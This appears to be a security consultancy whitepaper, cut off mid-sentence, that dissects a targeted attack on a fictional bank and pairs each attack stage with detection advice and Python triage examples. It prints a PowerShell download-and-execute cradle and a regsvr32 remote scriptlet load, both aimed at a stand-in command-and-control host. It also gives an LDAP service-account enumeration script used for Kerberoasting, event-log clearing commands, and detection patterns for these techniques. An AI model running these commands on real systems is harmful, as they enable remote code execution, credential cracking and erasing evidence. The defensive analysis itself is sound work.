YET ANOTHER BREACH
Analysis of a Targeted Cyber Attack
An F-Secure Consulting Whitepaper
ABOUT F-SECURE CONSULTING
F-Secure Consulting is the amalgamation of four specialist cyber security firms – MWR, nSense, Inverse Path, and Digital Assurance – combining 59 years of real-world expertise into one global, research-led technical consultancy.
We design solutions and provide tailored advice in all areas of cyber security, from incident response through to securing critical embedded systems. Like storm chasers, our curiosity keeps us ahead of the threat as it evolves.
ABOUT F-SECURE COUNTERCEPT
F-Secure Countercept provides a complete managed service for the detection of, and response to, cyber attacks, specializing in the ability to detect and respond to state-sponsored attacks (APT groups).
Unlike the traditional style of intrusion detection, based on purely ‘alert driven’ monitoring, F-Secure Countercept offers a 24/7/365 proactive threat-hunting service built around Endpoint Detection and Response (EDR) that utilizes security professionals with real-world experience in attack simulation and incident response.
Yet Another Breach
Written in partnership with F-Secure Countercept, this paper provides an example of a modern, targeted attack against a large organization, and the actions of an unsuccessful defensive team. All its contents are based on our combined, real-world experience.
We consider how and why the many security controls companies typically have in place fail to prevent or detect such attacks. We also describe the security controls and detection methodologies that would have been effective at each stage.
THIS PAPER WILL HELP:
CISOs/CIOs
• Understand the nature of a modern targeted attack
• Ask your security teams the right questions
• Assess whether your organization could withstand such an attack
Technical cyber defense staff
• Understand the tactics typically used by modern threat actors
• Gauge whether the controls you have in place are effective against them
• Discover which new controls are worth adding to your defensive setup
In-house incident response teams
• Assess whether the data sources and technologies you have in place would allow an effective investigation and response exercise in the face of such an attack
“WHERE DID WE GO WRONG?”
CONTENTS
2 YET ANOTHER BREACH
3 EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION
4 PERIMETER BREACH – INITIAL EXPLOITATION
6 F-SECURE COUNTERCEPT INSIGHTS
7 PAYLOAD EXECUTION
9 F-SECURE COUNTERCEPT INSIGHTS
10 MAINTAINING ACCESS
12 F-SECURE COUNTERCEPT INSIGHTS
13 INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT
18 F-SECURE COUNTERCEPT INSIGHTS
20 DATA EXFILTRATION
21 F-SECURE COUNTERCEPT INSIGHTS
22 ACTIONS ON OBJECTIVES
23 TIMELINE OF ATTACK
24 CONCLUSIONS
YET ANOTHER BREACH
As attackers become more persistent, defensive threat-hunting teams are adapting. The best are equally aggressive, continually securing, monitoring, and responding to attacks on their networks.
Though reports are frequently released about the latest organization to fall victim to an Advanced Persistent Threat (APT), the reality is that relatively simple techniques are used to attack them. The APT merely relies on a lack of preparation in terms of prevention, detection, and response.
The Cyber Kill Chain concept is commonly used to illustrate an attack. Often shown as a linear process, the attacker makes eight steps to reach their goal:
Reconnaissance
The surveillance stage. Attackers assess the vulnerabilities of their target’s network estate (usually from the outside-in) to design a suitable attack plan.
Intrusion
Using the data gathered through their reconnaissance, the attacker enters their target’s systems, often making use of malware or security vulnerabilities.
Exploitation
The attacker exploits vulnerabilities and delivers malicious code onto the system to get a better foothold.
Privilege Escalation
To gain access to more data and permissions, the attacker escalates their privileges, often to an Admin.
Lateral Movement
Once in the system, the attacker can move laterally to other systems and accounts to gain more leverage, e.g. higher permissions, more critical data, and greater access.
Obfuscation/anti-forensics
The attacker lays false trails, compromises data, and clears logs to confuse and slow down any forensics team.
Denial of Service
Standard access for users and systems is disrupted to stop the attack from being monitored, tracked, or blocked.
Actions on Objectives
The extraction stage. The attacker finally executes actions to achieve their goal, from encryption for ransom, to data exfiltration or destruction.
This description of the attacker methodology
works at a high-level, but in practice, things are
rarely this linear.
EXAMPLE PROCESS OF A TARGETED ATTACK SIMULATION
Acme Bank is a large financial institution with 30,000 employees and 20 offices worldwide. The bank has a large security team of 80 staff, plus a 24/7 Security Operations Center (SOC) employing 15 individuals.
The security team uses many of the security processes and technologies common to others in its sector. For example, the bank is both PCI- and ISO 27001-compliant. It also has centralized patch management solutions in place, strong password policies, employee security awareness training, network IDS/IPS appliances, secure web and email gateways, antivirus software, data-loss prevention technologies, centralized logging using SIEM technology, regular security testing, and a range of intelligence feeds.
Several waves of targeted phishing attacks were launched against Acme Bank from 2016. The attackers repeatedly compromised the bank’s corporate workstations. In every instance the security team was aware of, the target workstations were removed from the network, forensically investigated, and rebuilt. The domains used for phishing attacks, and the command-and-control channels, were also blocked at the organization’s web and mail gateways.
No more aggressive activity was seen after the initial barrage of attacks, and it was thought the threat had been successfully repelled. However, in late July, the attackers were able to reach the SWIFT payment systems and transfer large sums of money to accounts overseas. This activity was only detected after the funds had been transferred, and it is now believed that most of it was linked to a single advanced threat actor, codenamed ‘Laser Tiger’.
This chain of events highlights significant deficiencies in both the preventative controls and detection capabilities deployed by Acme Bank.
TO DETECT COMPROMISES AND RESPOND EFFECTIVELY, THREAT-HUNTERS DEVELOP A REAL-WORLD UNDERSTANDING OF OFFENSIVE TECHNIQUES WITHIN THE ATTACKER MINDSET – THEY BECOME RESEARCHERS, CONTINUALLY COLLECTING AND ANALYSING DATA.
PERIMETER BREACH – INITIAL EXPLOITATION
Laser Tiger routinely used targeted spear-phishing to obtain credentials and compromise user workstations within Acme Bank. The phishing emails contained many forms of content, ranging from malicious links and attachments, to more complex social engineering techniques.
One phishing campaign that focused on credential harvesting used an employee survey targeting a few hundred users. It copied the legitimate employee survey page present on the Acme Bank website. The URL for this domain (acmebank-survey.com) also imitated the legitimate domain (acmebank.com), tricking many users.
Two smaller, more targeted campaigns that involved a deep level of social engineering were aimed at the assistants of key executives in the bank. Multiple messages were exchanged with a human operator pretending to work for an events management company. Their goal was to have the user download and execute a specific payload.
The attackers demonstrated knowledge of staff structure, roles, and employee relationships, suggesting the collection of a significant amount of open-source intelligence (OSINT) prior to the attack, using sources such as LinkedIn and Facebook. In one instance, a message closely matched content found on a public profile on Glassdoor.
[Figure: phishing infrastructure diagram; labels: AWS, Cloudflare]
Acme Bank had security controls in place that neither prevented nor detected this stage of the attack. Some of the most significant are listed below:
Threat Intelligence Feeds
This was a targeted attack using unique domains, IPs, and payloads. None of these were on any blacklists.
Uncategorized Site Blocking
Acme Bank’s web proxy blocked access to newly-registered domains that hadn’t been categorized. However, the domains used in the attack had been registered some time in advance and categorized as financial news sites. In some cases, recently expired trusted domains were re-registered and used.
Security Patching
The exploitation techniques didn’t require the exploitation of any vulnerabilities and therefore worked successfully on fully-patched systems. While common executable file types were blocked at both web and mail gateways, this didn’t include more esoteric executable equivalents, such as HTA files and Office documents containing macros.
F-SECURE COUNTERCEPT INSIGHTS
The attackers relied heavily on delivering link and
attachment payloads via email. From a defensive
perspective, it’s important that security teams are given
access to email data sets and the ability to perform
automated analysis at scale. While it’s not practical to
block all potentially malicious content, it is possible to
flag some for review.
Links are commonly used by attackers to direct users
to malicious external content. Automated analysis of all
links received in emails, and web proxy logs to ascertain
the content returned, can prove a useful technique for
highlighting emails that could be harmful. In this instance,
it’s uncommon for HTA files or macro-enabled Microsoft
Office documents to be received from external sources,
so these could be flagged for review.
Varying levels of email attachment analysis can also be
performed. At a basic level, collecting the names or types
of attachment can highlight suspicious payloads. A more
effective technique would be to analyze the payloads
themselves. A static analysis of all attachments to look
for embedded macros or executable content should be
complemented by a dynamic analysis to understand in
detail what each attachment does.
As more advanced attackers are likely to anticipate
dynamic analysis solutions and use tricks to defeat them,
it’s still important to use more generic indicators to triage
attachments for manual analysis.
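As an added illustration of the attachment triage described above (example code written for this page, not code from the F-Secure paper or the Countercept service), the following Python inspects attachments of an inbound message and flags the two content types the paper singles out: HTA files, recognised by their content rather than their name, and OOXML documents carrying an embedded VBA project. The sample message, the INTERNAL_DOMAINS allow-list and the extension lists are assumptions constructed for the example.

```python
"""Triage e-mail attachments for content that is rarely legitimate from external
senders (HTA files and macro-enabled Office documents). Added example; not code
from the F-Secure paper. The message below is constructed for the demonstration."""
import email
import io
import zipfile
from email import policy
from email.message import EmailMessage
from email.utils import parseaddr

INTERNAL_DOMAINS = {"acmebank.com"}   # assumption: the defended organisation's mail domains
SCRIPT_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".ps1"}
MACRO_EXTENSIONS = {".docm", ".dotm", ".xlsm", ".xltm", ".pptm", ".doc", ".xls", ".ppt"}
OOXML_EXTENSIONS = {".docx", ".docm", ".dotx", ".dotm", ".xlsx", ".xlsm", ".pptx", ".pptm"}


def looks_like_hta(data: bytes) -> bool:
    """HTA files are HTML with an <hta:application> element; check content, not just the name."""
    head = data[:4096].lower()
    return b"<hta:application" in head


def ooxml_has_macros(data: bytes) -> bool:
    """OOXML documents are zip containers; VBA code is stored in a vbaProject.bin part."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())
    except zipfile.BadZipFile:
        return False


def triage_message(raw: bytes) -> list:
    """Return one finding per suspicious attachment: file name, sender origin, reasons."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    sender = parseaddr(str(msg.get("From", "")))[1].lower()
    external = sender.rsplit("@", 1)[-1] not in INTERNAL_DOMAINS
    findings = []
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        ext = "." + name.rsplit(".", 1)[-1] if "." in name else ""
        data = part.get_payload(decode=True) or b""
        reasons = []
        if ext in SCRIPT_EXTENSIONS:
            reasons.append(f"script extension {ext}")
        if looks_like_hta(data):
            reasons.append("HTA content")
        if ext in MACRO_EXTENSIONS:
            reasons.append(f"macro-capable extension {ext}")
        if ext in OOXML_EXTENSIONS and ooxml_has_macros(data):
            reasons.append("embedded VBA project")
        if reasons:
            findings.append({"file": name, "external": external, "reasons": reasons})
    return findings


def build_sample_eml() -> bytes:
    """Constructed phishing message: an HTA, a macro-enabled .docm and a benign PDF."""
    hta = (b"<html><head><hta:application id='app' windowstate='minimize'/></head>"
           b"<body><script>/* dropper would go here */</script></body></html>")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0" + b"\x00" * 12)  # placeholder OLE header
    msg = EmailMessage()
    msg["From"] = "Events Team <events@conference-example.com>"
    msg["To"] = "pa.exec@acmebank.com"
    msg["Subject"] = "Speaker agreement for your principal"
    msg.set_content("Please review the attached agreement and confirm attendance.")
    msg.add_attachment(hta, maintype="application", subtype="hta", filename="agreement.hta")
    msg.add_attachment(buf.getvalue(), maintype="application",
                       subtype="vnd.ms-word.document.macroEnabled.12", filename="agreement.docm")
    msg.add_attachment(b"%PDF-1.4\n% benign agenda", maintype="application", subtype="pdf",
                       filename="agenda.pdf")
    return msg.as_bytes()
```

Run `triage_message(build_sample_eml())` and the HTA and the .docm are returned with their reasons while the PDF is not; the `external` flag is what lets a reviewer prioritise the queue, since the same file types from internal senders are far more often legitimate.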
PAYLOAD EXECUTION
HTA files and Microsoft Office documents with embedded
macros were the two primary techniques used to achieve
code execution on end user workstations within the
Acme Bank network. A range of phishing attacks was
launched, containing payloads that made use of legitimate
Windows functionality – such as PowerShell, regsvr32.exe,
and Windows script engines (WScript/JScript) – to load
malicious code. The initial dropper code would commonly
retrieve a remote payload and inject code directly into
memory within a legitimate Windows process.
EXAMPLE 1
One of the payloads utilizing PowerShell exploited the IEX and WebClient functionality to download its second stage from a remote HTTP resource using the following:

powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile -c "$u=new-object net.webclient;$u.proxy=[Net.WebRequest]::GetSystemWebProxy();$u.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex($u.DownloadString('http://c2-domain.com/abc'))"

EXAMPLE 2
regsvr32.exe was used to run a second scripting stage from an external HTTP resource:

Set oShell = CreateObject("WScript.Shell")
oShell.run "regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll"
Keeping the initial payload small, and loading the second stage remotely within memory, is advantageous to attackers. It makes forensic discovery harder, and allows them to easily change the functionality of their payload in future.
These techniques were successfully used against Acme Bank, bypassing a number of security controls in place:
Antivirus
No known malicious binaries were used. Instead, legitimate Windows functionality was utilized with small, dynamic, initial payloads that loaded the second stages entirely within the memory space of legitimate processes.
Application Control
Acme Bank makes use of Microsoft AppLocker to prevent general users from launching arbitrary executables and scripts from certain locations. However, Office macros are exempt from this, and HTA files can load within Internet Explorer, rendering AppLocker ineffective.
F-SECURE COUNTERCEPT INSIGHTS
Security teams need effective endpoint detection and response (EDR) software to collect useful data, like real-time process execution events across all endpoints. This is an essential first step when tracking attackers. Without it, Acme Bank’s security team was essentially left blind to the actions performed on its network. Attacker process activity usually differs greatly from that of typical users. Laser Tiger, for example, used many built-in Windows tools with specific command line parameters uncommon for the average employee.
Anomaly-detection techniques applied to these data sets,
along with additional scoring for particularly dangerous
command line options, can be used to accurately identify
suspicious uses of legitimate Windows functionality. This
includes options to load code from external sources and
anomalous parent-child relationships. For example, it would
be unusual to see Microsoft Office open a macro-enabled
document, then launch regsvr32.exe with command line
arguments for loading a script from HTTP resources.
More advanced EDR solutions could have memory analysis
capabilities that also detect evidence of code injection,
malicious DLL loading, and API hooking. This approach can
help identify other suspicious scenarios, such as the above
processes also showing evidence of reflectively loaded DLLs
and/or remotely injected threads. These are traits typical of
memory-resident malware.
We have used these methods to effectively detect file-free
malware utilizing legitimate scripting engines and code-
injection techniques.
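The scoring described above, as an added example (not code from the F-Secure paper or the Countercept product): process-creation events are scored on two signals, an Office application spawning a script host, and dangerous command-line options such as loading a scriptlet from an HTTP URL or evaluating a downloaded string in memory. The events are constructed from the command lines shown in Examples 1 and 2 plus benign activity; the weights, the threshold and the host names are assumptions.

```python
"""Score process-creation events for suspicious use of built-in Windows tooling:
anomalous parent/child pairs plus dangerous command-line options. Added example,
not from the F-Secure paper; the events below are constructed, not real telemetry."""
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "regsvr32.exe", "mshta.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "cmd.exe"}

# (regex applied to the lower-cased command line, weight, description); weights are assumptions
OPTION_RULES = [
    (r"/i:https?://", 40, "regsvr32 scriptlet loaded over HTTP"),
    (r"\bscrobj\.dll\b", 30, "scrobj.dll scriptlet host"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", 40, "remote download"),
    (r"\biex\b|invoke-expression", 30, "in-memory script evaluation"),
    (r"-w(indowstyle)?\s+hidden", 15, "hidden window"),
    (r"-e(xecutionpolicy)?\s+bypass", 15, "execution policy bypass"),
    (r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}", 30, "encoded command"),
    (r"https?://", 20, "URL in command line"),
]


def score_event(parent: str, image: str, cmdline: str) -> tuple:
    """Return (score, reasons) for one process-creation event."""
    parent, image, low = parent.lower(), image.lower(), cmdline.lower()
    score, reasons = 0, []
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        score += 50
        reasons.append(f"{parent} spawned {image}")
    if image in SCRIPT_HOSTS:                  # only script hosts get option scoring
        for pattern, weight, why in OPTION_RULES:
            if re.search(pattern, low):
                score += weight
                reasons.append(why)
    return score, reasons


def triage(events: list, threshold: int = 50) -> list:
    """Return events at or above the threshold, highest score first."""
    out = []
    for ev in events:
        s, why = score_event(ev["parent"], ev["image"], ev["cmdline"])
        if s >= threshold:
            out.append({**ev, "score": s, "reasons": why})
    return sorted(out, key=lambda e: e["score"], reverse=True)


SAMPLE_EVENTS = [  # constructed process-creation events
    {"host": "WS0142", "parent": "WINWORD.EXE", "image": "regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://c2-domain.com/name.jpg scrobj.dll"},
    {"host": "WS0142", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -WindowStyle hidden -ExecutionPolicy Bypass -nologo -noprofile "
                "-c \"$u=new-object net.webclient;iex($u.DownloadString('http://c2-domain.com/abc'))\""},
    {"host": "WS0290", "parent": "OUTLOOK.EXE", "image": "mshta.exe",
     "cmdline": "mshta.exe C:\\Users\\jsmith\\AppData\\Local\\Temp\\invite.hta"},
    {"host": "WS0301", "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command Get-Service"},
    {"host": "WS0301", "parent": "explorer.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://intranet.acmebank.com/"},
]
```

On the sample set the Word-to-regsvr32 chain and the PowerShell download cradle score well above the threshold, the Outlook-to-mshta event is flagged on the parent/child relationship alone, and the two ordinary events score zero. The rules are deliberately coarse; in practice the score would be combined with the per-estate frequency of each command line so that a noisy but legitimate admin script does not keep firing.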
MAINTAINING ACCESS
Attackers commonly seek to achieve sustained access to a network’s compromised systems over a long period of time. Laser Tiger did so using multiple techniques to provide a choice of routes into Acme Bank’s network. This meant if one or two were discovered and shut down, it would still have access via other means.
One method of maintaining persistent access was the use of conditional Microsoft Outlook rules that, when triggered, would download and execute a payload in-memory. This ensured their access was resistant to system reboots and logins/logoffs, i.e. every time the affected user started Microsoft Outlook, the attackers regained remote control of the workstation.
The attackers also made use of more common persistence techniques, such as registry-based Run keys and scheduled tasks. However, they avoided any that involved writing an actual file to disk on the user workstations; all techniques were file-free and loaded the malicious payload within memory from across the network.
When the attackers later targeted servers within Acme Bank’s environment and gained administrative-level access, their tactics changed, and custom services were created to deliver payloads. Service executables were placed in legitimate locations within Program Files, digitally signed with a certificate issued by a certificate authority, placed on the server, and made to blend in with existing software to avoid detection. Timestamps for the files were also modified to look as though they’d been present for years. For example:
Service Name: Java Update Service
Description: Provides updates for the Java™ platform
Executable Path: C:\Program Files (x86)\Java\jre1.8.0_73\bin\javau.exe
Acme Bank had a chance to detect the compromised workstations at
this stage, but the controls they had in place failed to do so.
Security Information and Event Management (SIEM)
Logging provided Acme Bank with log sources (e.g. Windows event logs) from across its network. These sometimes included key data such as the creation of new services or scheduled tasks, but missed others, such as registry Run keys and Outlook rules. With new software and updates causing log source events to occur in vast numbers every day, but with no advanced analysis functionality or anomaly-detection capabilities in place, it was easy for malicious modifications to get lost within the background noise. As a result, the data that was actually available became relevant only in retrospect.
F-SECURE COUNTERCEPT INSIGHTS
Monitoring for new persistence entries is one of the
most effective ways for teams to detect the early stages
of a compromise. Windows provides a multitude of
persistence mechanisms, such as services, scheduled
tasks, registry locations, and start-up folders.
While Acme Bank had information relating to these
mechanisms from Windows logs, it was only collected
from key servers. Thus, in a snowstorm of installs and
updates, without the correct analysis techniques in
place, the chances of identifying a malicious compromise
were poor.
An effective method of persistence detection would
be to gather as much persistence data as possible from
the entire workstation and server estate. This should be
complete with supplementary data, such as cryptographic
file hashes and digital signature information. EDR toolsets
should be capable of doing this data harvesting.
The data sets can then be aggregated to perform frequency analysis and be automatically enriched using external information sources such as software libraries and data sources like VirusTotal. This makes it far easier to differentiate rapidly between legitimate updates and malicious scheduled tasks; in practice, between events like:
a. A single Google Chrome update, made to 30,000 systems, using a known-good hash, and digitally signed by Google.
b. A small number of potentially malicious scheduled tasks referencing PowerShell, with options to remotely load code from an HTTP resource.
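The frequency analysis above, as an added example (not code from the F-Secure paper or the Countercept product): persistence entries harvested from the estate are grouped by type, file hash and command line, and each group is judged on prevalence, signer and whether the command loads code remotely. The inventory is generated in the block rather than taken from a real EDR, and the hashes, signer names, allow-lists and hostnames are all assumptions. Note that the PowerShell task is signed by Microsoft, so signature checks alone would pass it; rarity and the remote-load option are what surface it.

```python
"""Frequency analysis of persistence entries harvested from an estate (scheduled
tasks, services, Run keys). Added example, not from the F-Secure paper; the
inventory is generated below rather than taken from a real EDR. Hashes, signer
names and hostnames are made up."""
import re
from collections import defaultdict

REMOTE_LOAD = re.compile(r"downloadstring|downloadfile|/i:https?://|https?://|-enc", re.I)
TRUSTED_SIGNERS = {"Google LLC", "Microsoft Windows", "Microsoft Corporation"}  # assumption
KNOWN_GOOD_HASHES = {"sha256:chrome-updater-89.0"}   # assumption: fed from a software library / VirusTotal


def make_inventory(n_hosts: int = 3000) -> list:
    """Constructed estate: two fleet-wide legitimate entries plus three rare ones."""
    rows = []
    for i in range(n_hosts):
        host = f"WS{i:05d}"
        rows.append(dict(host=host, kind="task", name="GoogleUpdateTaskMachineUA",
                         command=r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe /ua",
                         sha256="sha256:chrome-updater-89.0", signer="Google LLC"))
        rows.append(dict(host=host, kind="task", name="Windows Defender Scheduled Scan",
                         command=r"C:\Program Files\Windows Defender\MpCmdRun.exe Scan",
                         sha256="sha256:mpcmdrun-4.18", signer="Microsoft Windows"))
    for host in ("WS00142", "WS00290"):      # two phished workstations
        rows.append(dict(host=host, kind="task", name="AdobeFlashUpdate",
                         command="powershell.exe -w hidden -c \"iex((new-object net.webclient)"
                                 ".downloadstring('http://c2-domain.com/abc'))\"",
                         sha256="sha256:powershell-10.0", signer="Microsoft Windows"))
    rows.append(dict(host="SRV-STAGE01", kind="service", name="Java Update Service",
                     command=r"C:\Program Files (x86)\Java\jre1.8.0_73\bin\javau.exe",
                     sha256="sha256:e3b0c44298fc", signer="Contoso Software Ltd"))  # placeholder hash
    return rows


def analyse(rows: list, n_hosts: int, rare_fraction: float = 0.01) -> list:
    """Group by (kind, hash, command), compute prevalence and score each group."""
    groups, meta = defaultdict(set), {}
    for r in rows:
        key = (r["kind"], r["sha256"], r["command"])
        groups[key].add(r["host"])
        meta[key] = r
    findings = []
    for key, hosts in groups.items():
        kind, sha, cmd = key
        r = meta[key]
        if sha in KNOWN_GOOD_HASHES:
            continue                        # enrichment already vouches for this binary
        reasons = []
        if len(hosts) <= max(1, int(n_hosts * rare_fraction)):
            reasons.append(f"rare: {len(hosts)} of {n_hosts} hosts")
        if r["signer"] not in TRUSTED_SIGNERS:
            reasons.append(f"untrusted signer: {r['signer']}")
        if REMOTE_LOAD.search(cmd):
            reasons.append("command loads code remotely")
        if reasons:
            findings.append(dict(kind=kind, name=r["name"], hosts=sorted(hosts), reasons=reasons))
    return sorted(findings, key=lambda f: len(f["reasons"]), reverse=True)
```

Running `analyse(make_inventory(3000), 3000)` returns the two-host PowerShell task and the single-host Java service and nothing else: the Chrome entry is dropped by the known-good hash and the Defender task is fleet-wide, trusted and has no remote-load option.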
INTERNAL RECONNAISSANCE AND LATERAL MOVEMENT
Successfully breaching the perimeter
is the first step of any targeted attack
against a large organization. With access
to workstations inside the Acme Bank
network, the attackers were able to
then begin the information-gathering
phase. Their aim: to learn more about
the internal network architecture and
applications in use, with a view to extend
their access across the environment.
The initial stages of this reconnaissance
involved retrieving information about
the domain, such as users, groups,
group memberships, and key systems
and services. Instead of more traditional
techniques, like large-scale port
scanning, most information-gathering
activities were performed using in-
memory PowerShell and built-in
Windows functionality, such as DNS,
WMI, and LDAP.
The majority of network traffic in this
case simply used LDAP connections
to domain controllers. This gave the
attackers detailed knowledge of the
wider internal structure of the network,
which systems might be of interest
to them, and which users were worth
targeting in order to gain necessary
access.
Gaining more privileged access allowed
the attackers to move from their
existing compromised workstations
to other administrative workstations
and key servers. Firstly, the attackers
conducted SPN scanning via LDAP to
extract information about all services
present within the Active Directory
forest. This technique returns
information about hosts and services
running across the network, while only
requiring a single TCP connection to
LDAP on a domain controller.
# Resolve the forest root domain and build its distinguished name (e.g. DC=acmebank,DC=com)
$ADForestInfoRootDomain = ([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).RootDomain
$ADForestInfoRootDomainDN = "DC=" + $ADForestInfoRootDomain -replace "\.", ",DC="
# Bind to the Global Catalog so that SPNs from every domain in the forest are returned
$ADDomainInfoLGCDN = "GC://" + $ADForestInfoRootDomainDN
$root = [ADSI]$ADDomainInfoLGCDN
# A single paged LDAP search for every object that has a servicePrincipalName set
$ADSPNSearcher = New-Object System.DirectoryServices.DirectorySearcher($root, "(serviceprincipalname=*)")
$ADSPNSearcher.PageSize = 500
$AllADSQLServerSPNs = $ADSPNSearcher.FindAll()
With this information to-hand, the
attackers were able to use their existing
credentials to request Kerberos service
tickets and access all the services
present across the network. Kerberos
service tickets are encrypted using a
key from the password for the service
domain account itself. This allows them
to be used to perform offline password-
cracking attacks without triggering IDS
systems or account lockout thresholds,
as would be the case for a normal
online password-guessing attack.
Insufficiently complex passwords can
then be cracked, with privileged service
account passwords often allowing a
much greater level of access across
the network.
Evidence of unusually large numbers
of Kerberos service ticket requests was
seen in logs from Windows domain
controllers for specific users that
were later determined to have been
victims of the initial spear-phishing
attacks. It’s believed the attackers were
able to crack some of these Kerberos
service tickets so they could obtain the
password for domain service accounts.
Unfortunately for Acme Bank, this
was only discovered during forensic
investigation post-breach.
[Figure: Kerberos service ticket flow – the client authenticates to the domain and receives a Ticket Granting Ticket (TGT); it looks up the SPN for Exchange, presents the TGT and SPN to the Ticket Granting Service (TGS), receives a TGS ticket, and is granted access.]
Little forensic evidence of actual lateral movement was found
after the attack. While Windows logs for domain controllers
and key production servers were being collected using Acme
Bank’s SIEM, logs from the wider network of workstations and
development and test environments weren’t collected. Suspicious
activity within the domain controller logs was identified for one
particular service account and one admin user who worked on the
SWIFT environment. Subsequent manual forensic investigation
of the staging server where the service account was in use, and
of the admin user’s personal workstation, revealed some lateral
movement techniques used.
Using the following commands, Windows event logs were seen being cleared by the attackers, removing evidence of their activity. However, traces of the relevant logs were successfully recovered from volume shadow copies on the system.

wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
wevtutil.exe cl "Application"
wevtutil.exe cl "Security"
wevtutil.exe cl "System"
Remote access to the systems was gained using both network logons (type 3) over TCP/445 to spawn new processes, and RDP access (type 10, RemoteInteractive) via TCP/3389 in the case of the staging server. The service account was identified as having a weak password, so it’s assumed this was compromised from the SPN scanning and Kerberos service ticket cracking.
Another domain account present on this system had workstation
admin rights and, from the timeline of events, it appeared this was
used to specifically target the SWIFT admin user’s workstation and
harvest their privileged credentials from memory. Consequently,
it’s believed the workstation admin account was harvested from
the compromised staging server, allowing the attackers
to directly target the administrative users responsible for the
SWIFT environment.
Shortly after these events, wide-ranging access using the admin’s
account was observed within the SWIFT production environment
from the IP address of one of the original compromised
workstations and far in excess of the usual access patterns.
[Figure: lateral movement diagram; labels: RDP, SMB, Mimikatz]
Numerous security controls in Acme Bank’s environment failed
at this stage of the attack, but some of the key controls are
outlined below:
Password Policy
While a strong password policy was in place for new user accounts, the affected service account was years old without a set password expiry. Offline password cracking is effective against all but the strongest passwords, so the lack of regular password-cracking exercises within Acme Bank let this account go unnoticed and allowed the attackers to compromise it.
SIEM User Account Monitoring
Acme Bank’s SIEM consumed all Windows domain controller logs and critical production server logs but not logs from the wider infrastructure. This meant it was blind to attacks targeting development and test environments, as well as the entire workstation estate. Additionally, all views and alerting were focused on account brute-forcing and creation of new user accounts or modification of existing group memberships. However, Kerberos service ticket-specific monitoring wasn’t performed, meaning the sudden request for thousands of Kerberos service tickets by a single employee user account went unnoticed.
Network IDS
IDS appliances were placed at strategic locations to monitor network traffic for signs of attack, with events reported to the centralized SIEM. These were highly tuned to identify large-scale network port scanning and similar network enumeration techniques. However, they couldn’t identify modern enumeration techniques that utilize LDAP queries using a single connection to a small number of domain controllers. The number of alerts generated by the IDS was also extremely high and false-positive prone, so any relevant events were likely to be swallowed by a sea of noise.
Host-Based Firewalls
Windows Firewall was in use across the Microsoft domain estate with a domain profile set. While this had a default-deny rule for inbound connections, many of the default rules in place allowed access to key Windows ports such as TCP 135/139/445 for file and printer sharing. All servers also had a domain policy set via GPO to have remote desktop enabled. This crippled the protection of the host-based firewall and enabled the attackers to gain remote administrative access to most workstations and servers with ease, once they had valid credentials.
F-SECURE COUNTERCEPT INSIGHTS
Acme Bank was reliant on traditional security products, such as antivirus to detect payloads and IDS to detect network scanning. The attackers bypassed these controls and neither product provided any security value.
Additionally, their account-monitoring activity only
covered key production servers and domain controllers
and wasn’t monitoring for Kerberos-specific attacks.
Once an attacker has a foothold in a network and access
to legitimate user credentials, detection can become
significantly more difficult as the attacker will often use
purely legitimate tools from then on. Two of the most
appropriate techniques at this point would have been:
a. Slowing the ability of the attacker to move around the
network
b. Anomalous behavior-detection techniques,
identifying user accounts or systems operating
outside normal usage patterns
At the simplest level, good restriction of management
functionality using host-based firewalls can reduce an
attacker’s network mobility. Obtaining valid credentials
is one thing, but without access to management ports on
most of the network (such as RPC, SMB, RDP, WinRM, SSH,
and so on), it becomes very hard to make effective use of
these credentials.
Common group policy controls can effectively
prevent remote use of privileged credentials.
For example, many accounts that require
administrative access on a system might only
require that access locally, due to being service
accounts or desktop support accounts that
enable employees with physical access to
particular systems. Use of the ‘Deny access
to this computer from the network’ group
policy option and other similar controls can be
effective in limiting the impact of compromise
for certain groups of privileged user accounts.
The ‘Restrict NTLM’ group of options can also
hinder the use of pass-the-hash attacks for
remote access.
For anomalous behavior detection, the basic
idea is to use rolling time windows to build
profiles of common activity. It should identify
the systems from which each user account
normally operates interactively, and which
systems are normally accessed over the
network. Common profiles for the amount of
data sent outbound to internet addresses or
downloaded from internal resources can also
be created.
A standard employee will generally operate
their user account at a single workstation
and access a common set of services across
the network. If that account requests 2,000
Kerberos tickets while the LDAP traffic for
the user’s workstation spikes significantly,
this falls outside the norm and should be
flagged. Likewise, a service account that
normally operates interactively on a common
set of servers is then seen operating from
a workstation and accessing systems using
network logins, has deviated from its profile.
Effective application of these techniques
without overwhelming security teams
with false positives requires careful use of
machine-learning techniques. The idea is to
build accurate models of predictable users
and systems, while ruling out the minority of
unpredictable ones. Some simple first steps
can be applied to cover common scenarios
using more traditional approaches. Reviewing
